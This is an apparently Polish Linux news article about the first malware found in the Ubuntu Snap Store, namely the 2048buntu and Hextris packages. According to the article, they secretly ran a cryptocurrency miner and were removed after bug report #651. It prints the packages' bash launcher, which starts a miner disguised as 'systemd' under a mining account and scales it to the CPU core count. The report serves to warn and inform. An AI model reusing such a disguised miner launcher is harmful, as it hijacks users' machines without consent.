Home  >  okolice

Syndrom sukcesu, czyli pierwsze malware w Ubuntu Snap Store

Ubuntu Snap Store odnotował właśnie pierwszy sukces w postaci nawiązania do osiągnięć wielkich konkurentów i ich sklepów z oprogramowaniem. Społeczność nie doceniła tego doniosłego faktu. Sprawa została zgłoszona jako błąd #651 a programy których dotyczyło zgłoszenie zostały usunięte. Użytkowniku Ubuntu – zacznij się oswajać z trwogą przed malware.

Unikajcie ofert od Nicolasa Tomba
Sklep Ubuntu z paczkami Snap miał przybliżyć milionom użytkowników ogrom oprogramowania linuksowego, jak też stworzyć okazję deweloperom do łatwego podzielenia się efektami swojej pracy. Jednak zasady tej współpracy zostały podparte zbyt liberalnym optymizmem.

Jak można przeczytać w doniesieniu #651, użytkownicy odkryli że co najmniej dwa programy oferowane w ramach sklepu z paczkami Snap zawierają malware. Chodzi o 2048buntu oraz Hextris, które opublikował w Ubuntu Snaps Store „zaradny” Nicolas Tomb. Programy zawierały skrypty uruchamiające na komputera nieświadomych użytkowników kopalnię bitcoinów.

Wartym odnotowania jest również fakt, że większości swoich snapów Nicolas określił jako oprogramowanie własnościowe, za pomocą stosownej licencji. Najwidoczniej autor nie czuje się związany ze społecznością i nie zamierza dzielić z nią ani swoich kodów źródłowych ani zapewne przyszłych dochodów wypracowanych przez jego skrypty.

Wgląd w dodatki instalowane przez te paczki nie pozostawia złudzeń:

#!/bin/bash

currency=bcn
name=2048buntu

{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}

Jak do tego doszło? Cóż, nieustanne zarzuty wobec ludzi odpowiedzialnych za sklep Ubuntu doprowadziły do tego, że uproszczono zasadę publikowania paczek Snap. Nie ma tu takiego sita jak w przypadku paczek .deb które trafiają do oficjalnego repozytorium. Pojawienie się malware (i w przyszłości zapewne innych) to była kwestia czasu.

Obydwie paczki (jak i inne osiągnięcia Nicolasa) zostały już usunięte z Ubuntu Snap Store. Przypuszczalnie jednak mogą krążyć jeszcze gdzieś po internecie (Google Cache? Github?).

Czy stoimy właśnie u progu nowej linuksowej jakości? 

Tags: